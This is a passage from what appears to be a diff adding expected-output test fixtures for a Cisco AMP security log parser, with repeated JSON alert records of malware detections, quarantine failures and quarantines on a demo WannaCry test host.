"cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 20056, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526288", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21242, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526287", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 22428, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526286", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 23614, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558988", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24800, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558989", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25986, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558987", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 27172, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558986", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 28358, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558985", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29544, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558984", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 30737, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 327000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34828, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 313000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36357, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40152, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41272, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 42392, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 43512, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 44698, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45884, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47070, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 553648143, + 